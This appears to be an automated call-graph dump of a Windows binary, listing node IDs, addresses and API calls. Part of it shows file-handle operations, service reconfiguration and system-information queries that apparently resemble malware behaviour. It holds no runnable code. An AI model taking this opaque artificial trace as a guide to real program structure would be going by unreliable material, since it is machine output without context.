110450->110439 110451->110421 110452->110425 110453->110425 110455 424a50 110454->110455 110459 424a74 110454->110459 110456 4246e6 __filbuf 58 API calls 110455->110456 110455->110459 110457 424a6d 110456->110457 110499 42d886 110457->110499 110460 430b77 110459->110460 110461 430b84 110460->110461 110463 425371 110460->110463 110462 422d55 _free 58 API calls 110461->110462 110461->110463 110462->110463 110464 4246e6 110463->110464 110465 4246f0 110464->110465 110466 424705 110464->110466 110641 428b28 58 API calls __getptd_noexit 110465->110641 110466->110447 110468 4246f5 110642 428db6 9 API calls __cftof_l 110468->110642 110470 424700 110470->110447 110472 430a0e __initptd 110471->110472 110473 430a32 110472->110473 110474 430a1b 110472->110474 110476 430abd 110473->110476 110477 430a42 110473->110477 110658 428af4 58 API calls __getptd_noexit 110474->110658 110663 428af4 58 API calls __getptd_noexit 110476->110663 110480 430a60 110477->110480 110481 430a6a 110477->110481 110479 430a20 110659 428b28 58 API calls __getptd_noexit 110479->110659 110660 428af4 58 API calls __getptd_noexit 110480->110660 110485 42d206 ___lock_fhandle 59 API calls 110481->110485 110482 430a65 110664 428b28 58 API calls __getptd_noexit 110482->110664 110487 430a70 110485->110487 110489 430a83 110487->110489 110490 430a8e 110487->110490 110488 430ac9 110665 428db6 9 API calls __cftof_l 110488->110665 110643 430add 110489->110643 110661 428b28 58 API calls __getptd_noexit 110490->110661 110493 430a27 __initptd 110493->110449 110495 430a89 110662 430ab5 LeaveCriticalSection __unlock_fhandle 110495->110662 110497->110440 110498->110439 110500 42d892 __initptd 110499->110500 110501 42d8b6 110500->110501 110502 42d89f 110500->110502 110503 42d955 110501->110503 110506 42d8ca 110501->110506 110600 428af4 58 API calls __getptd_noexit 110502->110600 110606 428af4 58 API calls __getptd_noexit 110503->110606 110505 42d8a4 110601 428b28 58 API calls __getptd_noexit 110505->110601 110509 42d8f2 110506->110509 110510 42d8e8 110506->110510 110527 42d206 110509->110527 110602 428af4 58 API calls __getptd_noexit 110510->110602 110511 42d8ed 110607 428b28 58 API calls __getptd_noexit 110511->110607 110512 42d8ab __initptd 110512->110459 110515 42d8f8 110517 42d90b 110515->110517 110518 42d91e 110515->110518 110536 42d975 110517->110536 110603 428b28 58 API calls __getptd_noexit 110518->110603 110519 42d961 110608 428db6 9 API calls __cftof_l 110519->110608 110523 42d923 110604 428af4 58 API calls __getptd_noexit 110523->110604 110524 42d917 110605 42d94d LeaveCriticalSection __unlock_fhandle 110524->110605 110528 42d212 __initptd 110527->110528 110529 42d261 EnterCriticalSection 110528->110529 110530 429c0b __lock 58 API calls 110528->110530 110531 42d287 __initptd 110529->110531 110532 42d237 110530->110532 110531->110515 110533 42d24f 110532->110533 110609 429e2b InitializeCriticalSectionAndSpinCount 110532->110609 110610 42d28b LeaveCriticalSection _doexit 110533->110610 110537 42d982 __write_nolock 110536->110537 110538 42d9e0 110537->110538 110539 42d9c1 110537->110539 110569 42d9b6 110537->110569 110543 42da1c 110538->110543 110547 42da38 110538->110547 110620 428af4 58 API calls __getptd_noexit 110539->110620 110542 42d9c6 110621 428b28 58 API calls __getptd_noexit 110542->110621 110623 428af4 58 API calls __getptd_noexit 110543->110623 110544 42e1d6 110544->110524 110546 42da51 110611 435c6b 110546->110611 110547->110546 110626 4318c1 60 API calls 3 library calls 110547->110626 110549 42d9cd 110622 428db6 9 API calls __cftof_l 110549->110622 110552 42da21 110624 428b28 58 API calls __getptd_noexit 110552->110624 110554 42da5f 110556 42ddb8 110554->110556 110627 4299ac 58 API calls 2 library calls 110554->110627 110558 42ddd6 110556->110558 110559 42e14b WriteFile 110556->110559 110557 42da28 110625 428db6 9 API calls __cftof_l 110557->110625 110562 42defa 110558->110562 110567 42ddec 110558->110567 110563 42ddab GetLastError 110559->110563 110571 42dd78 110559->110571 110574 42df05 110562->110574 110577 42dfef 110562->110577 110563->110571 110564 42da8b GetConsoleMode 110564->110556 110566 42daca 110564->110566 110565 42e184 110565->110569 110632 428b28 58 API calls __getptd_noexit 110565->110632 110566->110556 110572 42dada GetConsoleCP 110566->110572 110567->110565 110568 42de5b WriteFile 110567->110568 110568->110563 110573 42de98 110568->110573 110634 42c5f6 110569->110634 110571->110565 110571->110569 110576 42ded8 110571->110576 110572->110565 110596 42db09 110572->110596 110573->110567 110579 42debc 110573->110579 110574->110565 110580 42df6a WriteFile 110574->110580 110575 42e1b2 110633 428af4 58 API calls __getptd_noexit 110575->110633 110582 42dee3 110576->110582 110583 42e17b 110576->110583 110577->110565 110578 42e064 WideCharToMultiByte 110577->110578 110578->110563 110592 42e0ab 110578->110592 110579->110571 110580->110563 110584 42dfb9 110580->110584 110629 428b28 58 API calls __getptd_noexit 110582->110629 110631 428b07 58 API calls 3 library calls 110583->110631 110584->110571 110584->110574 110584->110579 110587 42e0b3 WriteFile 110590 42e106 GetLastError 110587->110590 110587->110592 110588 42dee8 110630 428af4 58 API calls __getptd_noexit 110588->110630 110590->110592 110592->110571 110592->110577 110592->110579 110592->110587 110593 42dbf2 WideCharToMultiByte 110593->110571 110595 42dc2d WriteFile 110593->110595 110594 4362ba 60 API calls __write_nolock 110594->110596 110595->110563 110598 42dc5f 110595->110598 110596->110571 110596->110593 110596->110594 110596->110598 110628 4235f5 58 API calls __isleadbyte_l 110596->110628 110597 437a5e WriteConsoleW CreateFileW __putwch_nolock 110597->110598 110598->110563 110598->110571 110598->110596 110598->110597 110599 42dc87 WriteFile 110598->110599 110599->110563 110599->110598 110600->110505 110601->110512 110602->110511 110603->110523 110604->110524 110605->110512 110606->110511 110607->110519 110608->110512 110609->110533 110610->110529 110612 435c76 110611->110612 110614 435c83 110611->110614 110613 428b28 ___libm_error_support 58 API calls 110612->110613 110615 435c7b 110613->110615 110616 435c8f 110614->110616 110617 428b28 ___libm_error_support 58 API calls 110614->110617 110615->110554 110616->110554 110618 435cb0 110617->110618 110619 428db6 __cftof_l 9 API calls 110618->110619 110619->110615 110620->110542 110621->110549 110622->110569 110623->110552 110624->110557 110625->110569 110626->110546 110627->110564 110628->110596 110629->110588 110630->110569 110631->110569 110632->110575 110633->110569 110635 42c600 IsProcessorFeaturePresent 110634->110635 110636 42c5fe 110634->110636 110638 43590a 110635->110638 110636->110544 110639 4358b9 ___raise_securityfailure 5 API calls 110638->110639 110640 4359ed 110639->110640 110640->110544 110641->110468 110642->110470 110666 42d4c3 110643->110666 110645 430b41 110679 42d43d 59 API calls 2 library calls 110645->110679 110646 430aeb 110646->110645 110648 430b1f 110646->110648 110650 42d4c3 __close_nolock 58 API calls 110646->110650 110648->110645 110651 42d4c3 __close_nolock 58 API calls 110648->110651 110649 430b49 110652 430b6b 110649->110652 110680 428b07 58 API calls 3 library calls 110649->110680 110653 430b16 110650->110653 110654 430b2b CloseHandle 110651->110654 110652->110495 110656 42d4c3 __close_nolock 58 API calls 110653->110656 110654->110645 110657 430b37 GetLastError 110654->110657 110656->110648 110657->110645 110658->110479 110659->110493 110660->110482 110661->110495 110662->110493 110663->110482 110664->110488 110665->110493 110667 42d4e3 110666->110667 110668 42d4ce 110666->110668 110674 42d508 110667->110674 110683 428af4 58 API calls __getptd_noexit 110667->110683 110681 428af4 58 API calls __getptd_noexit 110668->110681 110671 42d4d3 110682 428b28 58 API calls __getptd_noexit 110671->110682 110672 42d512 110684 428b28 58 API calls __getptd_noexit 110672->110684 110674->110646 110676 42d4db 110676->110646 110677 42d51a 110685 428db6 9 API calls __cftof_l 110677->110685 110679->110649 110680->110652 110681->110671 110682->110676 110683->110672 110684->110677 110685->110676 110901 404bb5 110686->110901 110691 43d8e6 110693 404e4a 84 API calls 110691->110693 110692 404e08 LoadLibraryExW 110911 404b6a 110692->110911 110695 43d8ed 110693->110695 110697 404b6a 3 API calls 110695->110697 110701 43d8f5 110697->110701 110699 404e2f 110700 404e3b 110699->110700 110699->110701 110937 404f0b 110701->110937 110707 43d91c 110882->110150 110884 43ed4a 110883->110884 110885 407cbf 110883->110885 110887 408029 59 API calls 110884->110887 111349 407c50 110885->111349 110889 43ed55 __NMSG_WRITE _memmove 110887->110889 110888 407cca 110888->110184 110890->110186 110891->110200 110950 404c03 110901->110950 110904 404c03 2 API calls 110907 404bdc 110904->110907 110905 404bf5 110908 42525b 110905->110908 110906 404bec FreeLibrary 110906->110905 110907->110905 110907->110906 110954 425270 110908->110954 110910 404dfc 110910->110691 110910->110692 111035 404c36 110911->111035 110914 404c36 2 API calls 110917 404b8f 110914->110917 110915 404ba1 FreeLibrary 110916 404baa 110915->110916 110918 404c70 110916->110918 110917->110915 110917->110916 110919 420db6 Mailbox 59 API calls 110918->110919 110920 404c85 110919->110920 111039 40522e 110920->111039 110922 404c91 _memmove 110923 404ccc 110922->110923 110924 404dc1 110922->110924 110925 404d89 110922->110925 110926 404ec7 69 API calls 110923->110926 111053 46991b 95 API calls 110924->111053 111042 404e89 CreateStreamOnHGlobal 110925->111042 110934 404cd5 110926->110934 110929 404f0b 74 API calls 110929->110934 110930 404d69 110930->110699 110932 43d8a7 110933 404ee5 85 API calls 110932->110933 110934->110929 110934->110930 110934->110932 111048 404ee5 110934->111048 110938 404f1d 110937->110938 110939 43d9cd 110937->110939 111071 4255e2 110938->111071 110942 469109 111196 468f5f 110942->111196 110944 46911f 110944->110707 110951 404bd0 110950->110951 110952 404c0c LoadLibraryA 110950->110952 110951->110904 110951->110907 110952->110951 110953 404c1d GetProcAddress 110952->110953 110953->110951 110957 42527c __initptd 110954->110957 110955 42528f 111003 428b28 58 API calls __getptd_noexit 110955->111003 110957->110955 110959 4252c0 110957->110959 110958 425294 111004 428db6 9 API calls __cftof_l 110958->111004 110973 4304e8 110959->110973 110962 4252c5 110963 4252db 110962->110963 110964 4252ce 110962->110964 110966 425305 110963->110966 110967 4252e5 110963->110967 111005 428b28 58 API calls __getptd_noexit 110964->111005 110988 430607 110966->110988 111006 428b28 58 API calls __getptd_noexit 110967->111006 110970 42529f __initptd @_EH4_CallFilterFunc@8 110970->110910 110974 4304f4 __initptd 110973->110974 110975 429c0b __lock 58 API calls 110974->110975 110986 430502 110975->110986 110976 43057d 111013 42881d 58 API calls 2 library calls 110976->111013 110977 430576 111008 4305fe 110977->111008 110980 430584 110980->110977 111014 429e2b InitializeCriticalSectionAndSpinCount 110980->111014 110981 4305f3 __initptd 110981->110962 110983 429c93 __mtinitlocknum 58 API calls 110983->110986 110985 4305aa EnterCriticalSection 110985->110977 110986->110976 110986->110977 110986->110983 111011 426c50 59 API calls __lock 110986->111011 111012 426cba LeaveCriticalSection LeaveCriticalSection _doexit 110986->111012 110997 430627 __wopenfile 110988->110997 110989 430641 111019 428b28 58 API calls __getptd_noexit 110989->111019 110990 4307fc 110990->110989 110994 43085f 110990->110994 110992 430646 111020 428db6 9 API calls __cftof_l 110992->111020 111016 4385a1 110994->111016 110995 425310 111007 425332 LeaveCriticalSection LeaveCriticalSection _fseek 110995->111007 110997->110989 110997->110990 111021 4237cb 60 API calls 3 library calls 110997->111021 110999 4307f5 110999->110990 111022 4237cb 60 API calls 3 library calls 110999->111022 111001 430814 111001->110990 111023 4237cb 60 API calls 3 library calls 111001->111023 111003->110958 111004->110970 111005->110970 111006->110970 111007->110970 111015 429d75 LeaveCriticalSection 111008->111015 111010 430605 111010->110981 111011->110986 111012->110986 111013->110980 111014->110985 111015->111010 111024 437d85 111016->111024 111019->110992 111020->110995 111021->110999 111022->111001 111023->110990 111027 437d91 __initptd 111024->111027 111025 437da7 111026 428b28 ___libm_error_support 58 API calls 111025->111026 111028 437dac 111026->111028 111027->111025 111029 437ddd 111027->111029 111031 428db6 __cftof_l 9 API calls 111028->111031 111030 437e4e __wsopen_nolock 109 API calls 111029->111030 111032 437df9 111030->111032 111033 437e22 __wsopen_helper LeaveCriticalSection 111032->111033 111036 404b83 111035->111036 111037 404c3f LoadLibraryA 111035->111037 111036->110914 111036->110917 111037->111036 111038 404c50 GetProcAddress 111037->111038 111038->111036 111040 420db6 Mailbox 59 API calls 111039->111040 111041 405240 111040->111041 111041->110922 111043 404ec0 111042->111043 111044 404ea3 FindResourceExW 111042->111044 111043->110923 111044->111043 111045 43d933 LoadResource 111044->111045 111045->111043 111046 43d948 SizeofResource 111045->111046 111046->111043 111047 43d95c LockResource 111046->111047 111047->111043 111049 404ef4 111048->111049 111050 43d9ab 111048->111050 111054 42584d 111049->111054 111053->110923 111074 4255fd 111071->111074 111073 404f2e 111073->110942 111075 425609 __initptd 111074->111075 111076 42561f _memset 111075->111076 111077 42564c 111075->111077 111078 425644 __initptd 111075->111078 111101 428b28 58 API calls __getptd_noexit 111076->111101 111079 426c11 __lock_file 59 API calls 111077->111079 111078->111073 111081 425652 111079->111081 111087 42541d 111081->111087 111082 425639 111102 428db6 9 API calls __cftof_l 111082->111102 111091 425438 _memset 111087->111091 111094 425453 111087->111094 111088 425443 111192 428b28 58 API calls __getptd_noexit 111088->111192 111090 425448 111193 428db6 9 API calls __cftof_l 111090->111193 111091->111088 111091->111094 111098 425493 111091->111098 111103 425686 LeaveCriticalSection LeaveCriticalSection _fseek 111094->111103 111095 4255a4 _memset 111195 428b28 58 API calls __getptd_noexit 111095->111195 111096 4246e6 __filbuf 58 API calls 111096->111098 111098->111094 111098->111095 111098->111096 111104 430e5b 111098->111104 111172 430ba7 111098->111172 111194 430cc8 58 API calls 4 library calls 111098->111194 111101->111082 111102->111078 111103->111078 111105 430e93 111104->111105 111106 430e7c 111104->111106 111107 4315cb 111105->111107 111112 430ecd 111105->111112 111108 428af4 __write 58 API calls 111106->111108 111173 430bb2 111172->111173 111176 430bc7 111172->111176 111174 428b28 ___libm_error_support 58 API calls 111173->111174 111178 435fe4 __getbuf 58 API calls 111176->111178 111179 430bfc 111176->111179 111186 430bc2 111176->111186 111178->111179 111186->111098 111192->111090 111193->111094 111194->111098 111195->111090 111199 42520a GetSystemTimeAsFileTime 111196->111199 111198 468f6e 111198->110944 111200 425238 __aulldiv 111199->111200 111200->111198 111350 407c5f __NMSG_WRITE 111349->111350 111351 408029 59 API calls 111350->111351 111352 407c70 _memmove 111350->111352 111353 43ed07 _memmove 111351->111353 111352->110888 111393 407a16 111355->111393 111357 40646a 111400 40750f 111357->111400 111359 406484 Mailbox 111359->110229 111362 43dff6 111410 45f8aa 91 API calls 4 library calls 111362->111410 111363 407d8c 59 API calls 111369 406265 111363->111369 111366 40750f 59 API calls 111366->111369 111368 43e004 111370 40750f 59 API calls 111368->111370 111369->111357 111369->111362 111369->111363 111369->111366 111372 406799 _memmove 111369->111372 111373 43df92 111369->111373 111377 407e4f 59 API calls 111369->111377 111398 405f6c 60 API calls 111369->111398 111399 405d41 59 API calls Mailbox 111369->111399 111408 405e72 60 API calls 111369->111408 111409 407924 59 API calls 2 library calls 111369->111409 111371 43e01a 111370->111371 111371->111359 111411 45f8aa 91 API calls 4 library calls 111372->111411 111374 408029 59 API calls 111373->111374 111375 43df9d 111374->111375 111379 420db6 Mailbox 59 API calls 111375->111379 111378 40643b CharUpperBuffW 111377->111378 111378->111369 111379->111372 111381 43f7d6 111380->111381 111382 409aa8 111380->111382 111383 43f7e7 111381->111383 111384 407bcc 59 API calls 111381->111384 111387 420db6 Mailbox 59 API calls 111382->111387 111385 407d8c 59 API calls 111383->111385 111384->111383 111386 43f7f1 111385->111386 111390 407667 59 API calls 111386->111390 111392 409ad4 111386->111392 111388 409abb 111387->111388 111388->111386 111389 409ac6 111388->111389 111391 407de1 59 API calls 111389->111391 111389->111392 111390->111392 111391->111392 111392->110233 111394 420db6 Mailbox 59 API calls 111393->111394 111395 407a3b 111394->111395 111396 408029 59 API calls 111395->111396 111397 407a4a 111396->111397 111397->111369 111398->111369 111399->111369 111401 4075af 111400->111401 111405 407522 _memmove 111400->111405 111403 420db6 Mailbox 59 API calls 111401->111403 111402 420db6 Mailbox 59 API calls 111404 407529 111402->111404 111403->111405 111406 420db6 Mailbox 59 API calls 111404->111406 111407 407552 111404->111407 111405->111402 111406->111407 111407->111359 111408->111369 111409->111369 111410->111368 111411->111359 111412->110243 111413->110240 111414->110255 111415->110253 111416->110257 111417->110267 111418->110269 111419->110273 111420->109989 111421->109988 111422->109882 111423->109882 111424->109875 111425->109866 111426->109869 111427->109866 111428->109901 111429 b5aaf0 111430 b5ab06 111429->111430 111434 b5ab57 111430->111434 111435 b56490 111430->111435 111437 b55f10 111435->111437 111438 b55d90 111435->111438 111436 b56084 SetFilePointerEx 111436->111437 111437->111436 111437->111438 111439 b8faf0 111438->111439 111440 b8fafd 111439->111440 111441 b8fb84 111439->111441 111440->111441 111444 b8fb2a 111440->111444 111446 b8fc05 111441->111446 111449 b8fbda 111441->111449 111443 b908d6 111443->111434 111445 b9032f 111444->111445 111458 b91a1b 21 API calls 2 library calls 111444->111458 111445->111434 111450 b8fc38 111446->111450 111457 b90fe0 21 API calls __startOneArgErrorHandling 111446->111457 111448 b8fc22 111448->111434 111449->111450 111451 b9116e 111449->111451 111452 b91167 111449->111452 111450->111434 111460 b90fe0 21 API calls __startOneArgErrorHandling 111451->111460 111459 b90ff7 21 API calls __startOneArgErrorHandling 111452->111459 111455 b9116c 111455->111434 111456 b91173 111456->111434 111457->111448 111458->111443 111459->111455 111460->111456 111461 dd8d58 111475 dd69a8 111461->111475 111463 dd8e6f 111478 dd8c48 111463->111478 111477 dd7033 111475->111477 111481 dd9e98 GetPEB 111475->111481 111477->111463 111479 dd8c51 Sleep 111478->111479 111480 dd8c5f 111479->111480 111481->111477 111482 401066 111487 40f76f 111482->111487 111484 40106c 111485 422d40 __cinit 67 API calls 111484->111485 111486 401076 111485->111486 111488 40f790 111487->111488 111520 41ff03 111488->111520 111492 40f7d7 111493 407667 59 API calls 111492->111493 111494 40f7e1 111493->111494 111495 407667 59 API calls 111494->111495 111496 40f7eb 111495->111496 111497 407667 59 API calls 111496->111497 111498 40f7f5 111497->111498 111499 407667 59 API calls 111498->111499 111500 40f833 111499->111500 111501 407667 59 API calls 111500->111501 111502 40f8fe 111501->111502 111530 415f87 111502->111530 111506 40f930 111507 407667 59 API calls 111506->111507 111508 40f93a 111507->111508 111558 41fd9e 111508->111558 111510 40f981 111511 40f991 GetStdHandle 111510->111511 111512 40f9dd 111511->111512 111513 4445ab 111511->111513 111514 40f9e5 OleInitialize 111512->111514 111513->111512 111515 4445b4 111513->111515 111514->111484 111565 466b38 64 API calls Mailbox 111515->111565 111517 4445bb 111566 467207 CreateThread 111517->111566 111519 4445c7 CloseHandle 111519->111514 111567 41ffdc 111520->111567 111523 41ffdc 59 API calls 111524 41ff45 111523->111524 111525 407667 59 API calls 111524->111525 111526 41ff51 111525->111526 111527 407bcc 59 API calls 111526->111527 111528 40f796 111527->111528 111529 420162 6 API calls 111528->111529 111529->111492 111531 407667 59 API calls 111530->111531 111532 415f97 111531->111532 111533 407667 59 API calls 111532->111533 111534 415f9f 111533->111534 111574 415a9d 111534->111574 111537 415a9d 59 API calls 111538 415faf 111537->111538 111539 407667 59 API calls 111538->111539 111540 415fba 111539->111540 111541 420db6 Mailbox 59 API calls 111540->111541 111542 40f908 111541->111542 111543 4160f9 111542->111543 111544 416107 111543->111544 111545 407667 59 API calls 111544->111545 111546 416112 111545->111546 111547 407667 59 API calls 111546->111547 111548 41611d 111547->111548 111549 407667 59 API calls 111548->111549 111550 416128 111549->111550 111551 407667 59 API calls 111550->111551 111552 416133 111551->111552 111553 415a9d 59 API calls 111552->111553 111554 41613e 111553->111554 111555 420db6 Mailbox 59 API calls 111554->111555 111556 416145 RegisterWindowMessageW 111555->111556 111556->111506 111559 45576f 111558->111559 111560 41fdae 111558->111560 111577 469ae7 60 API calls 111559->111577 111562 420db6 Mailbox 59 API calls 111560->111562 111564 41fdb6 111562->111564 111563 45577a 111564->111510 111565->111517 111566->111519 111578 4671ed 65 API calls 111566->111578 111568 407667 59 API calls 111567->111568 111569 41ffe7 111568->111569 111570 407667 59 API calls 111569->111570 111571 41ffef 111570->111571 111572 407667 59 API calls 111571->111572 111573 41ff3b 111572->111573 111573->111523 111575 407667 59 API calls 111574->111575 111576 415aa5 111575->111576 111576->111537 111577->111563 111579 b7cbd0 111597 b7be50 _wcslen 111579->111597 111580 b7c168 111618 b7a905 LocalFree 111580->111618 111583 b7c78e CloseServiceHandle 111583->111597 111584 b7bffd StrStrIW 111584->111597 111585 b7c706 StrStrIW 111585->111597 111587 b7bf68 StrStrIW 111587->111597 111588 b7c72b StrStrIW 111588->111597 111589 b7c399 StrStrIW 111593 b7c3a9 111589->111593 111589->111597 111590 b7bf7e 111594 b7c7e4 StartServiceW 111590->111594 111595 b7c36b OpenServiceW 111590->111595 111592 b7c0fd CloseServiceHandle 111592->111597 111594->111597 111595->111597 111596 b7c65a ChangeServiceConfigW 111596->111597 111598 b7bfe9 111596->111598 111597->111579 111597->111580 111597->111583 111597->111584 111597->111585 111597->111587 111597->111588 111597->111589 111597->111590 111597->111592 111597->111594 111597->111596 111597->111598 111599 b5ce90 111597->111599 111617 b7a350 CloseServiceHandle 111597->111617 111619 b55d20 111597->111619 111610 b5cc9b _wcslen 111599->111610 111600 b5d5c5 CreateFileW 111600->111610 111601 b5d729 GetFileSizeEx 111603 b5d8a1 CloseHandle 111601->111603 111601->111610 111602 b5d426 111602->111603 111604 b5d42a CloseHandle 111602->111604 111603->111610 111604->111610 111605 b5cd5c lstrcmpiW 111605->111610 111607 b5cca0 lstrcmpiW 111607->111610 111609 b5d049 SetFilePointerEx 111609->111610 111610->111597 111610->111599 111610->111600 111610->111601 111610->111602 111610->111603 111610->111604 111610->111605 111610->111607 111610->111609 111611 b5cc92 111610->111611 111612 b55d20 VirtualAlloc VirtualFree 111610->111612 111613 b5d903 111610->111613 111614 b5d378 CloseHandle 111610->111614 111615 b5cfbb GetFileTime 111610->111615 111624 b58937 VirtualAlloc VirtualFree 111610->111624 111625 b58470 VirtualAlloc VirtualFree 111610->111625 111611->111597 111612->111610 111613->111611 111616 b8fdfc 40 API calls 111613->111616 111614->111610 111615->111610 111616->111613 111617->111597 111618->111598 111620 b55d22 111619->111620 111620->111597 111621 b55d39 VirtualAlloc 111620->111621 111623 b55d46 VirtualFree 111620->111623 111621->111620 111623->111597 111624->111610 111626 40552a 111633 405ab8 111626->111633 111632 40555a Mailbox 111634 420db6 Mailbox 59 API calls 111633->111634 111635 405acb 111634->111635 111636 420db6 Mailbox 59 API calls 111635->111636 111637 40553c 111636->111637 111638 4054d2 111637->111638 111652 4058cf 111638->111652 111641 405514 111641->111632 111644 408061 MultiByteToWideChar 111641->111644 111643 4054e3 111643->111641 111659 405bc0 111643->111659 111665 405a7a 111643->111665 111645 408087 111644->111645 111646 4080ce 111644->111646 111648 420db6 Mailbox 59 API calls 111645->111648 111647 407d8c 59 API calls 111646->111647 111651 4080c0 111647->111651 111649 40809c MultiByteToWideChar 111648->111649 111682 40774d 111649->111682 111651->111632 111653 4058e0 111652->111653 111654 43dc3c 111652->111654 111653->111643 111674 455ecd 59 API calls Mailbox 111654->111674 111656 43dc46 111657 420db6 Mailbox 59 API calls 111656->111657 111658 43dc52 111657->111658 111660 405c33 111659->111660 111664 405bce 111659->111664 111675 405c4e SetFilePointerEx 111660->111675 111662 405bf6 111662->111643 111663 405c06 ReadFile 111663->111662 111663->111664 111664->111662 111664->111663 111666 43dcee 111665->111666 111667 405a8e 111665->111667 111681 455ecd 59 API calls Mailbox 111666->111681 111676 4059b9 111667->111676 111670 405a9a 111670->111643 111671 43dcf9 111672 420db6 Mailbox 59 API calls 111671->111672 111673 43dd0e _memmove 111672->111673 111674->111656 111675->111664 111677 4059d1 111676->111677 111680 4059ca _memmove 111676->111680 111678 420db6 Mailbox 59 API calls 111677->111678 111679 43dc7e 111677->111679 111678->111680 111680->111670 111681->111671 111683 40775c 111682->111683 111684 4077cf 111682->111684 111683->111684 111686 407768 111683->111686 111685 407d2c 59 API calls 111684->111685 111692 40777a _memmove 111685->111692 111687 4077a0 111686->111687 111688 407772 111686->111688 111689 408029 59 API calls 111687->111689 111694 407f27 59 API calls Mailbox 111688->111694 111691 4077aa 111689->111691 111693 420db6 Mailbox 59 API calls 111691->111693 111692->111651 111693->111692 111694->111692 111695 40e5ab 111698 40d100 111695->111698 111697 40e5b9 111699 40d11d 111698->111699 111716 40d37d 111698->111716 111700 4426e0 111699->111700 111701 442691 111699->111701 111721 40d144 111699->111721 111742 47a3e6 341 API calls __cinit 111700->111742 111703 442694 111701->111703 111712 4426af 111701->111712 111705 4426a0 111703->111705 111703->111721 111740 47a9fa 341 API calls 111705->111740 111706 422d40 __cinit 67 API calls 111706->111721 111709 40d434 111734 408a52 68 API calls 111709->111734 111710 4428b5 111710->111710 111711 40d54b 111711->111697 111712->111716 111741 47aea2 341 API calls 3 library calls 111712->111741 111716->111711 111747 469e4a 89 API calls 4 library calls 111716->111747 111717 4427fc 111746 47a751 89 API calls 111717->111746 111718 40d443 111718->111697 111721->111706 111721->111709 111721->111711 111721->111716 111721->111717 111722 4084c0 69 API calls 111721->111722 111729 409ea0 341 API calls 111721->111729 111730 408047 59 API calls 111721->111730 111732 408740 68 API calls __cinit 111721->111732 111733 408542 68 API calls 111721->111733 111735 40843a 68 API calls 111721->111735 111736 40cf7c 341 API calls 111721->111736 111737 409dda 59 API calls Mailbox 111721->111737 111738 40cf00 89 API calls 111721->111738 111739 40cd7d 341 API calls 111721->111739 111743 408a52 68 API calls 111721->111743 111744 409d3c 60 API calls Mailbox 111721->111744 111745 45678d 60 API calls 111721->111745 111722->111721 111729->111721 111730->111721 111732->111721 111733->111721 111734->111718 111735->111721 111736->111721 111737->111721 111738->111721 111739->111721 111740->111711 111741->111716 111742->111721 111743->111721 111744->111721 111745->111721 111746->111716 111747->111710 111748 40e48c 111751 40ccba 111748->111751 111750 40e498 111752 40ccd2 111751->111752 111753 40cd26 111751->111753 111752->111753 111754 409ea0 341 API calls 111752->111754 111756 40cd4f 111753->111756 111761 469e4a 89 API calls 4 library calls 111753->111761 111758 40cd09 111754->111758 111756->111750 111757 4425bc 111757->111757 111758->111756 111760 409d3c 60 API calls Mailbox 111758->111760 111760->111753 111761->111757 111762 40b40e 111763 41f944 60 API calls 111762->111763 111764 40b424 111763->111764 111770 40c5a7 111764->111770 111766 40b44c 111767 40a388 111766->111767 111782 469e4a 89 API calls 4 library calls 111766->111782 111769 4408e9 111771 407a16 59 API calls 111770->111771 111772 40c5cc _wcscmp 111771->111772 111773 407de1 59 API calls 111772->111773 111775 40c600 Mailbox 111772->111775 111774 441691 111773->111774 111776 407b2e 59 API calls 111774->111776 111775->111766 111777 44169c 111776->111777 111783 40843a 68 API calls 111777->111783 111779 4416ad 111781 4416b1 Mailbox 111779->111781 111784 409d3c 60 API calls Mailbox 111779->111784 111781->111766 111782->111769 111783->111779 111784->111781 111785 b55a3b 111786 b55a45 111785->111786 111787 b54f7c 111785->111787 111788 b551ae 111786->111788 111789 b55a4b CreateThread 111786->111789 111790 b55a59 RtlExitUserThread 111789->111790 111792 b55b17 111790->111792 111793 b55d20 2 API calls 111792->111793 111794 b55b3c 111793->111794 111795 b55085 111796 b5506f 111795->111796 111797 b55089 111795->111797 111800 b78550 111796->111800 111799 b55078 111807 b78556 111800->111807 111801 b78145 GetLastError 111814 b77dd7 111801->111814 111802 b78579 FreeSid 111802->111807 111803 b78bc1 GetLastError 111803->111807 111804 b783fb GetUserNameW 111804->111814 111805 b78209 GetUserNameW 111808 b77d37 111805->111808 111805->111814 111806 b78986 SetEntriesInAclW 111806->111807 111807->111800 111807->111801 111807->111802 111807->111803 111807->111806 111807->111808 111809 b7890b LocalFree 111807->111809 111810 b789cd OpenMutexW 111807->111810 111807->111814 111817 b77d30 111807->111817 111819 b77d20 111807->111819 111820 b78599 111807->111820 111822 b7896a wsprintfW 111807->111822 111823 b78953 AllocateAndInitializeSid 111807->111823 111808->111799 111809->111807 111810->111799 111811 b78248 111813 b7824a GetLastError 111811->111813 111813->111799 111814->111801 111814->111804 111814->111805 111814->111808 111814->111811 111814->111813 111815 b7836e GetLastError 111814->111815 111816 b77d6c GetVolumeInformationW 111814->111816 111814->111817 111818 b77fd4 GetLastError 111814->111818 111814->111819 111825 b77f6b GetVolumeInformationW 111814->111825 111815->111814 111816->111799 111817->111808 111817->111816 111818->111814 111819->111808 111819->111816 111819->111817 111821 b77d83 GetWindowsDirectoryW 111819->111821 111824 b77e06 GetComputerNameW 111819->111824 111820->111817 111820->111822 111821->111808 111821->111817 111822->111817 111823->111807 111824->111808 111825->111814 111826 403633 111827 40366a 111826->111827 111828 4036e5 111827->111828 111829 4036e7 111827->111829 111830 403688 111827->111830 111831 4036ca DefWindowProcW 111828->111831 111832 4036ed 111829->111832 111833 43d0cc 111829->111833 111834 403695 111830->111834 111835 40374b PostQuitMessage 111830->111835 111838 4036d8 111831->111838 111839 4036f2 111832->111839 111840 403715 SetTimer RegisterWindowMessageW 111832->111840 111875 411070 10 API calls Mailbox 111833->111875 111836 4036a0 111834->111836 111837 43d154 111834->111837 111835->111838 111843 403755 111836->111843 111844 4036a8 111836->111844 111891 462527 71 API calls _memset 111837->111891 111847 4036f9 KillTimer 111839->111847 111848 43d06f 111839->111848 111840->111838 111845 40373e CreatePopupMenu 111840->111845 111842 43d0f3 111876 411093 341 API calls Mailbox 111842->111876 111873 4044a0 64 API calls _memset 111843->111873 111850 4036b3 111844->111850 111851 43d139 111844->111851 111845->111838 111871 40443a Shell_NotifyIconW _memset 111847->111871 111854 43d074 111848->111854 111855 43d0a8 MoveWindow 111848->111855 111857 4036be 111850->111857 111858 43d124 111850->111858 111851->111831 111890 457c36 59 API calls Mailbox 111851->111890 111852 43d166 111852->111831 111852->111838 111860 43d097 SetFocus 111854->111860 111861 43d078 111854->111861 111855->111838 111857->111831 111877 40443a Shell_NotifyIconW _memset 111857->111877 111889 462d36 81 API calls _memset 111858->111889 